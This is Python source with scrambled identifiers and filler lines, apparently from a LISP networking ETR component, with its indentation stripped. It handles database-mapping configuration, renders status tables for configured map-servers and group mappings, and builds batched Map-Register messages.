if 29 - 29: OoooooooOO
if 23 - 23: o0oOOo0O0Ooo . II111iiii
if 98 - 98: iIii1I11I1II1 % OoOoOO00 * I1ii11iIi11i * OoOoOO00
if 45 - 45: I1Ii111 . OoOoOO00
if 83 - 83: oO0o . iIii1I11I1II1 . I1ii11iIi11i
if 31 - 31: Ii1I . Ii1I - o0oOOo0O0Ooo / OoO0O00 + ooOoO0o * I1IiiI
if 63 - 63: I1Ii111 % i1IIi / OoooooooOO - OoooooooOO
if ( O0OoOoo00o and iiiI11 ) : return
if 8 - 8: OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if ( len ( lisp . lisp_db_list ) > 0 ) :
if ( OOO0o0o != None ) : return
OOO0o0o = threading . Timer ( 5 ,
iii11 , [ o0oOoO00o ] )
OOO0o0o . start ( )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
def oo000OO00Oo ( kv_pair ) :
global Oo0o , OOO0o0o
global o0oOoO00o , iiiI11
global lisp_seen_eid_done_count
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if 66 - 66: OoOoOO00
if 97 - 97: oO0o % IiII * IiII
if 39 - 39: Ii1I % IiII
if 4 - 4: oO0o
if 93 - 93: OoO0O00 % oO0o . OoO0O00 * I1Ii111 % Ii1I . II111iiii
if ( iiiI11 ) : return
if 38 - 38: o0oOOo0O0Ooo
lispconfig . lisp_database_mapping_command ( kv_pair , I1Ii11I1Ii1i ,
( O0OoOoo00o == False ) )
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if ( lisp . lisp_nat_traversal ) : return
if ( OOO0o0o != None ) : return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if ( O0OoOoo00o ) :
o0 = len ( lisp . lisp_db_list )
if ( o0 % 1000 == 0 ) :
lisp . fprint ( "{} database-mappings processed" . format ( o0 ) )
if 91 - 91: iIii1I11I1II1 + I1Ii111
if 31 - 31: IiII . OoOoOO00 . OOooOOo
O0oOoOO = lisp . lisp_db_list [ - 1 ]
if ( O0oOoOO . eid . is_dist_name ( ) == False ) : return
if ( O0oOoOO . eid . address != "eid-done" ) : return
iiiI11 = True
if 96 - 96: Oo0Ooo
lisp . fprint ( "Finished batch of {} database-mappings" . format ( o0 ) )
if 45 - 45: O0 * o0oOOo0O0Ooo % Oo0Ooo * OoooooooOO + iII111i . OoOoOO00
Oo0ooOo0o = threading . Timer ( 0 , iii11 ,
[ o0oOoO00o ] )
Oo0o = Oo0ooOo0o
Oo0o . start ( )
return
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
OOO0o0o = threading . Timer ( 5 ,
iii11 , [ o0oOoO00o ] )
OOO0o0o . start ( )
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
def o0o ( clause ) :
if 84 - 84: O0
if 74 - 74: I1ii11iIi11i - I1IiiI - Oo0Ooo . Ii1I - IiII
if 73 - 73: Oo0Ooo - i1IIi - i1IIi - iII111i . Ii1I + I1ii11iIi11i
if 81 - 81: iII111i * oO0o - I1Ii111 . II111iiii % I11i / I1IiiI
iIIiIi1iIII1 = lispconfig . lisp_show_myrlocs ( "" )
if 78 - 78: O0 . oO0o . II111iiii % OOooOOo
if 49 - 49: Ii1I / OoO0O00 . II111iiii
if 68 - 68: i11iIiiIii % I1ii11iIi11i + i11iIiiIii
if 31 - 31: II111iiii . I1IiiI
iIIiIi1iIII1 = lispconfig . lisp_show_decap_stats ( iIIiIi1iIII1 , "ETR" )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
II111iiiI1Ii = lisp . lisp_decent_dns_suffix
if ( II111iiiI1Ii == None ) :
II111iiiI1Ii = ":"
else :
II111iiiI1Ii = " (dns-suffix '{}'):" . format ( II111iiiI1Ii )
if 78 - 78: Ii1I % I1Ii111 + I1ii11iIi11i
if 64 - 64: oO0o * O0 . I1IiiI + II111iiii
IIi1i = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
OOOO00O0O = "LISP-ETR Configured Map-Servers{}" . format ( II111iiiI1Ii )
OOOO00O0O = lisp . lisp_span ( OOOO00O0O , IIi1i )
if 33 - 33: O0 . IiII . I1IiiI
IIi1i = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
if 72 - 72: i1IIi / OoO0O00 + OoooooooOO - Oo0Ooo
iI1Iii = lisp . lisp_span ( "Registration<br>flags" , IIi1i )
if 68 - 68: OOooOOo % I1Ii111
iIIiIi1iIII1 += lispconfig . lisp_table_header ( OOOO00O0O , "Address" , "Auth-Type" ,
"xTR-ID" , "Site-ID" , iI1Iii , "Map-Registers<br>Sent" ,
"Map-Notifies<br>Received" )
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
OoO000 . resolve_dns_name ( )
IiI111111IIII = "" if OoO000 . ms_name == "all" else OoO000 . ms_name + "<br>"
i1Ii = IiI111111IIII + OoO000 . map_server . print_address_no_iid ( )
if ( OoO000 . dns_name ) : i1Ii += "<br>" + OoO000 . dns_name
if 14 - 14: iII111i
I1iI1iIi111i = "0x" + lisp . lisp_hex_string ( OoO000 . xtr_id )
iiIi1IIi1I = "{}-{}-{}-{}" . format ( "P" if OoO000 . proxy_reply else "p" ,
"M" if OoO000 . merge_registrations else "m" ,
"N" if OoO000 . want_map_notify else "n" ,
"R" if OoO000 . refresh_registrations else "r" )
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
O0ooO0Oo00o = OoO000 . map_registers_sent + OoO000 . map_registers_multicast_sent
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
iIIiIi1iIII1 += lispconfig . lisp_table_row ( i1Ii ,
"sha1" if ( OoO000 . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
I1iI1iIi111i , OoO000 . site_id , iiIi1IIi1I , O0ooO0Oo00o ,
OoO000 . map_notifies_received )
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
iIIiIi1iIII1 += lispconfig . lisp_table_footer ( )
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
iIIiIi1iIII1 = lispconfig . lisp_show_db_list ( "ETR" , iIIiIi1iIII1 )
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if ( len ( lisp . lisp_elp_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_elp_list ( iIIiIi1iIII1 )
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if ( len ( lisp . lisp_rle_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_rle_list ( iIIiIi1iIII1 )
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if ( len ( lisp . lisp_json_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_json_list ( iIIiIi1iIII1 )
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
OOOO00O0O = "Configured Group Mappings:"
iIIiIi1iIII1 += lispconfig . lisp_table_header ( OOOO00O0O , "Name" , "Group Prefix" ,
"Sources" , "Use MS" )
for Ii1I1Ii in list ( lisp . lisp_group_mapping_list . values ( ) ) :
OOoO0 = ""
for OO0Oooo0oOO0O in Ii1I1Ii . sources : OOoO0 += OO0Oooo0oOO0O + ", "
if ( OOoO0 == "" ) :
OOoO0 = "*"
else :
OOoO0 = OOoO0 [ 0 : - 2 ]
if 62 - 62: I1IiiI
iIIiIi1iIII1 += lispconfig . lisp_table_row ( Ii1I1Ii . group_name ,
Ii1I1Ii . group_prefix . print_prefix ( ) , OOoO0 , Ii1I1Ii . use_ms_name )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
iIIiIi1iIII1 += lispconfig . lisp_table_footer ( )
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
return ( iIIiIi1iIII1 )
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
def oooOo0OOOoo0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
if 51 - 51: Oo0Ooo / OoOoOO00 . OOooOOo * o0oOOo0O0Ooo + OoO0O00 * IiII
if 73 - 73: OoO0O00 + OoooooooOO - O0 - Ii1I - II111iiii
if 99 - 99: ooOoO0o . Ii1I + I1Ii111 + OoooooooOO % o0oOOo0O0Ooo
if 51 - 51: iIii1I11I1II1
if 34 - 34: oO0o + I1IiiI - oO0o
if 17 - 17: II111iiii % iII111i + I11i - iII111i / OOooOOo + ooOoO0o
if 59 - 59: OOooOOo % OoOoOO00 . Ii1I * I1ii11iIi11i % I11i
def oO0o0o0oo ( kv_pairs ) :
OOoO0 = [ ]
iI1111iiii = None
Oo0OO = None
IiI111111IIII = "all"
if 78 - 78: OOooOOo - OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii
for iiI11ii1I1 in list ( kv_pairs . keys ( ) ) :
Ooo0OOoOoO0 = kv_pairs [ iiI11ii1I1 ]
if ( iiI11ii1I1 == "group-name" ) :
oOo0OOoO0 = Ooo0OOoOoO0
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if ( iiI11ii1I1 == "group-prefix" ) :
if ( iI1111iiii == None ) :
iI1111iiii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
iI1111iiii . store_prefix ( Ooo0OOoOoO0 )
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if ( iiI11ii1I1 == "instance-id" ) :
if ( iI1111iiii == None ) :
iI1111iiii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
iI1111iiii . instance_id = int ( Ooo0OOoOoO0 )
if 26 - 26: Ii1I % I1ii11iIi11i
if ( iiI11ii1I1 == "ms-name" ) :
IiI111111IIII = Ooo0OOoOoO0 [ 0 ]
if 76 - 76: IiII * iII111i
if ( iiI11ii1I1 == "address" ) :
for ooooooo00o in Ooo0OOoOoO0 :
if ( ooooooo00o != "" ) : OOoO0 . append ( ooooooo00o )
if 73 - 73: OOooOOo
if 70 - 70: iIii1I11I1II1
if ( iiI11ii1I1 == "rle-address" ) :
if ( Oo0OO == None ) :
Oo0OO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 31 - 31: IiII - I1IiiI % iIii1I11I1II1
Oo0OO . store_address ( Ooo0OOoOoO0 )
if 92 - 92: i1IIi - iIii1I11I1II1
if 16 - 16: OoO0O00 - OoOoOO00 - OOooOOo - i1IIi / Ii1I
Ii1I1Ii = lisp . lisp_group_mapping ( oOo0OOoO0 , IiI111111IIII , iI1111iiii , OOoO0 ,
Oo0OO )
Ii1I1Ii . add_group ( )
return
if 88 - 88: OoO0O00
if 71 - 71: I1ii11iIi11i
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
def II1IIIIiII1i ( quiet , db , eid , group , ttl ) :
if 1 - 1: II111iiii
if 68 - 68: iII111i - I1IiiI / I1Ii111 / I11i
if 12 - 12: Ii1I + i11iIiiIii * iIii1I11I1II1 / I1ii11iIi11i . I11i
if 5 - 5: i1IIi + IiII / o0oOOo0O0Ooo . iII111i / I11i
if 32 - 32: I1IiiI % iIii1I11I1II1 / i1IIi - I1IiiI
if 7 - 7: I1Ii111 * OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % OoO0O00
if 15 - 15: OoOoOO00 % I1IiiI * I11i
if 81 - 81: ooOoO0o - iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * I11i
iI1i11II1i = { }
for o0o0OoOo0O0OO in db . rloc_set :
if ( o0o0OoOo0O0OO . translated_rloc . is_null ( ) ) : continue
if 36 - 36: OoOoOO00 - O0
for o0OOOooo0OOo in lisp . lisp_rtr_list :
iII1i11IIi1i = lisp . lisp_rtr_list [ o0OOOooo0OOo ]
if ( lisp . lisp_register_all_rtrs == False and iII1i11IIi1i == None ) :
lisp . lprint ( " Exclude unreachable RTR {}" . format ( lisp . red ( o0OOOooo0OOo , False ) ) )
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
continue
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if ( iII1i11IIi1i == None ) : continue
iI1i11II1i [ o0OOOooo0OOo ] = iII1i11IIi1i
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
break
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
O00oOOooo = 0
iI1iIii11Ii = b""
for IIi1i1I11Iii in [ eid . instance_id ] + eid . iid_list :
I1i1i1 = lisp . lisp_eid_record ( )
if 73 - 73: O0 * iII111i + Ii1I + ooOoO0o
I1i1i1 . rloc_count = len ( db . rloc_set ) + len ( iI1i11II1i )
I1i1i1 . authoritative = True
I1i1i1 . record_ttl = ttl
I1i1i1 . eid . copy_address ( eid )
I1i1i1 . eid . instance_id = IIi1i1I11Iii
I1i1i1 . eid . iid_list = [ ]
I1i1i1 . group . copy_address ( group )
if 40 - 40: II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
iI1iIii11Ii += I1i1i1 . encode ( )
if ( not quiet ) :
I1ii1I1iiii = lisp . lisp_print_eid_tuple ( eid , group )
iiI = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
iiI = lisp . lisp_get_decent_index ( eid )
iiI = lisp . bold ( str ( iiI ) , False )
iiI = ", decent-index {}" . format ( iiI )
if 56 - 56: Oo0Ooo . I1ii11iIi11i . I1IiiI
lisp . lprint ( " EID-prefix {} for ms-name '{}'{}" . format ( lisp . green ( I1ii1I1iiii , False ) , db . use_ms_name , iiI ) )
if 39 - 39: O0 + I1Ii111
I1i1i1 . print_record ( " " , False )
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
if 26 - 26: I1ii11iIi11i - OoooooooOO
for o0o0OoOo0O0OO in db . rloc_set :
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . store_rloc_entry ( o0o0OoOo0O0OO )
iiI1iI111ii1i . local_bit = o0o0OoOo0O0OO . rloc . is_local ( )
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
if ( not quiet ) : iiI1iI111ii1i . print_record ( " " )
if 32 - 32: II111iiii * OoOoOO00 % i1IIi - iII111i + iIii1I11I1II1 + I1ii11iIi11i
if 60 - 60: I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
for iII1i11IIi1i in list ( iI1i11II1i . values ( ) ) :
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc . copy_address ( iII1i11IIi1i )
iiI1iI111ii1i . priority = 254
iiI1iI111ii1i . rloc_name = "RTR"
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 255
iiI1iI111ii1i . mweight = 0
iiI1iI111ii1i . local_bit = False
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
if ( not quiet ) : iiI1iI111ii1i . print_record ( " RTR " )
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
if 95 - 95: I1IiiI
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
O00oOOooo += 1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
return ( iI1iIii11Ii , O00oOOooo )
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
if 88 - 88: OoOoOO00 / II111iiii
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
def i1iiI11I ( lisp_sockets , ttl , eid_only , ms_only , refresh ) :
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if ( eid_only != None ) :
IIii11I1i1I = 1
else :
IIii11I1i1I = lisp . lisp_db_list_length ( )
if ( IIii11I1i1I == 0 ) : return
if 99 - 99: iII111i
if 76 - 76: OoO0O00 * I1IiiI
if ( O0OoOoo00o ) :
lisp . fprint ( "Build Map-Register for {} database-mapping entries" . format ( IIii11I1i1I ) )
if 82 - 82: Ii1I * iII111i / I1ii11iIi11i
else :
lisp . fprint ( "Build Map-Register for {} database-mapping entries" . format ( IIii11I1i1I ) )
if 36 - 36: OoooooooOO - i1IIi . O0 / II111iiii + o0oOOo0O0Ooo
if 33 - 33: II111iiii / ooOoO0o * O0 % Ii1I * I1Ii111
if 100 - 100: IiII . I11i / Ii1I % OoOoOO00 % II111iiii - OoO0O00
if 46 - 46: O0 * II111iiii - Oo0Ooo * ooOoO0o
if 33 - 33: Ii1I
if 74 - 74: OOooOOo + O0 + i1IIi - i1IIi + II111iiii
oOOO0oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
ii1 = ( IIii11I1i1I > 12 )
if 1 - 1: ooOoO0o % iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % I1IiiI
o0o0oOoOO0O = { }
if ( oOOO0oo0 ) :
if 16 - 16: IiII % iIii1I11I1II1 . Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
for O0oOoOO in lisp . lisp_db_list :
i1OO0oOOoo = O0oOoOO . eid if O0oOoOO . group . is_null ( ) else O0oOoOO . group
oOOO00o000o = lisp . lisp_get_decent_dns_name ( i1OO0oOOoo )
o0o0oOoOO0O [ oOOO00o000o ] = [ ]
if 9 - 9: oO0o + I11i / I11i
else :
if 12 - 12: OoooooooOO % o0oOOo0O0Ooo * I11i % iIii1I11I1II1 / Ii1I
if 27 - 27: i11iIiiIii % II111iiii % I11i . O0 - Oo0Ooo + OoOoOO00
if 57 - 57: iIii1I11I1II1 / I11i - i1IIi
if 51 - 51: IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
if ( ms_only != None and OoO000 != ms_only ) : continue
o0o0oOoOO0O [ OoO000 . ms_name ] = [ ]
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
oo000 = lisp . lisp_map_register ( )
oo000 . nonce = 0xaabbccdddfdfdf00
oo000 . xtr_id_present = True
oo000 . use_ttl_for_timeout = True
if 32 - 32: i1IIi . Ii1I
if ( ttl == None ) : ttl = lisp . LISP_REGISTER_TTL
if 59 - 59: OoooooooOO
if 47 - 47: ooOoO0o - I1IiiI / II111iiii
if 12 - 12: OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
oO0oO0 = 65000 if ( O0OoOoo00o ) else 1100
for O0oOoOO in lisp . lisp_db_list :
if ( oOOO0oo0 ) :
i1i1IIIIi1i = lisp . lisp_get_decent_dns_name ( O0oOoOO . eid )
else :
i1i1IIIIi1i = O0oOoOO . use_ms_name
if 7 - 7: iIii1I11I1II1 + iII111i * i11iIiiIii / OoooooooOO + iII111i - Oo0Ooo
if 3 - 3: i1IIi / II111iiii / i11iIiiIii * i1IIi - II111iiii
if 42 - 42: II111iiii . OoooooooOO . o0oOOo0O0Ooo * oO0o
if 81 - 81: Ii1I * o0oOOo0O0Ooo + I1Ii111 + Oo0Ooo - OoooooooOO
if 32 - 32: Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
if 92 - 92: ooOoO0o
II11iI111i1 = o0o0oOoOO0O [ i1i1IIIIi1i ]
if ( II11iI111i1 == [ ] ) :
II11iI111i1 = [ b"" , 0 ]
o0o0oOoOO0O [ i1i1IIIIi1i ] . append ( II11iI111i1 )
else :
II11iI111i1 = o0o0oOoOO0O [ i1i1IIIIi1i ] [ - 1 ]
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
iI1iIii11Ii = b""
if ( O0oOoOO . dynamic_eid_configured ( ) ) :
for I1IIIiI1I1ii1 in list ( O0oOoOO . dynamic_eids . values ( ) ) :
i1OO0oOOoo = I1IIIiI1I1ii1 . dynamic_eid
if ( eid_only == None or eid_only . is_exact_match ( i1OO0oOOoo ) ) :
iiiI1I1iIIIi1 , O00oOOooo = II1IIIIiII1i ( ii1 , O0oOoOO ,
i1OO0oOOoo , O0oOoOO . group , ttl )
iI1iIii11Ii += iiiI1I1iIIIi1
II11iI111i1 [ 1 ] += O00oOOooo
if 17 - 17: iIii1I11I1II1 . OoooooooOO / I11i % II111iiii % i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
else :
if ( eid_only == None ) :
if ( ttl != 0 ) : ttl = O0oOoOO . register_ttl
iI1iIii11Ii , O00oOOooo = II1IIIIiII1i ( ii1 , O0oOoOO ,
O0oOoOO . eid , O0oOoOO . group , ttl )
II11iI111i1 [ 1 ] += O00oOOooo
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
II11iI111i1 [ 0 ] += iI1iIii11Ii
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if ( II11iI111i1 [ 1 ] == 20 or len ( II11iI111i1 [ 0 ] ) > oO0oO0 ) :
II11iI111i1 = [ b"" , 0 ]
o0o0oOoOO0O [ i1i1IIIIi1i ] . append ( II11iI111i1 )
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
oooO0o0o0O0 = .500 if ( O0OoOoo00o ) else .001
O00oOOooo = 0
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
if ( ms_only != None and OoO000 != ms_only ) : continue
if 27 - 27: OoooooooOO - iII111i / I11i
i1i1IIIIi1i = OoO000 . dns_name if oOOO0oo0 else OoO000 . ms_name
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
if 76 - 76: o0oOOo0O0Ooo % I1IiiI . iIii1I11I1II1 - IiII * OoooooooOO . iII111i
for II11iI111i1 in o0o0oOoOO0O [ i1i1IIIIi1i ] :
if 84 - 84: I1Ii111 + I11i
if 28 - 28: oO0o - i11iIiiIii . I1ii11iIi11i + IiII / I1ii11iIi11i
if 35 - 35: IiII
if 75 - 75: Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
oo000 . record_count = II11iI111i1 [ 1 ]
if ( oo000 . record_count == 0 ) : continue
if 41 - 41: Ii1I
